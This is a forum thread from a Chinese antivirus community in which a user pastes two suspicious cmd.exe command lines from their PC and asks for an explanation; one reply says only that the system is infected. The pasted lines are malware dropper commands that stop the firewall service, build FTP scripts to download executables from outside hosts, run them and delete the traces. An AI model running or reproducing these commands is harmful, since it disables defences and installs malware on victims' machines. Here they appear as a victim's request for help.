请高手帮我分析下这个进程什么意思??在线等 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 可疑文件交流请高手帮我分析下这个进程什么意思??在线等

	瑞星ESM助力北京石龙医院筑牢安全防线		瑞星恶意代码管理系统助金华电力提升防御能力		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		助力国家网络安全瑞星获病毒应急处理中心感谢信
	实力拉满瑞星第四十四次通过VB100测评		瑞星发布2024年六大网络安全趋势		瑞星携手中国农业大学共筑网络安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

请高手帮我分析下这个进程什么意思??在线等

╬預約離別初生襁褓狮帖子:2 注册: 2008-01-20 来自:	发表于： 2008-08-23 10:13 \| 只看楼主短消息资料字号：小中大 1楼请高手帮我分析下这个进程什么意思??在线等进程名称: cmd.exe 分析: 安全对应文件: C:\WINDOWS\system32\cmd.exe 命令行: "C:\WINDOWS\system32\cmd.exe" /c net1 stop sharedaccess&echo open 222.208.183.101>dboy.sys&echo admin>>dboy.sys&echo 123456>>dboy.sys&echo get guojig.exe C:\boots.exe>>dboy.sys&echo bye>>dboy.sys&echo ftp -s:dboy.sys>dboy.bat&echo copy C:\boots.exeC:\WINDOWS\system32\inf\test.exe&echo start start /high "" C:\WINDOWS\system32\inf\test.exe&echo start C:\boots.exe>>dboy.bat&echo start C:\boots.exe>>dboy.bat&echo del dboy.sys>>dboy.bat&echo del %0>>dboy.bat&dboy.bat 文件描述: Windows Command Processor 模块列表: -------------------------------------------------------------------- 进程名称: cmd.exe 分析: 安全对应文件: C:\WINDOWS\system32\cmd.exe 命令行: "C:\WINDOWS\system32\cmd.exe" /c sc stop sharedaccess&echo open ddosboy1.3322.org >dboy1.sys&echo dboy>>dboy1.sys&echo if>>dboy1.sys&echo get dboy1.exe C:\Windows\tcpsrv1.exe>>dboy1.sys&echo bye>>dboy1.sys&echo ftp -s:dboy1.sys>system1.bat&echo start C:\Windows\tcpsrv1.exe>>system1.bat&echo start C:\Windows\tcpsrv1.exe>>system1.bat&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat&system1.bat 文件描述: Windows Command Processor 模块列表: 请高手分析下这2个进程的命令行是什么意思? 在线等谢谢了! 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; CIBA; TheWorld)
╬預約離別初生襁褓狮帖子:2 注册: 2008-01-20 来自:	分享到：

jmbt 横据古稀狮帖子:8345 注册: 2006-01-18 来自:	发表于： 2008-08-24 08:58 \| 短消息资料字号：小中大 2楼回复：请高手帮我分析下这个进程什么意思??在线等你的系统有毒
jmbt 横据古稀狮帖子:8345 注册: 2006-01-18 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT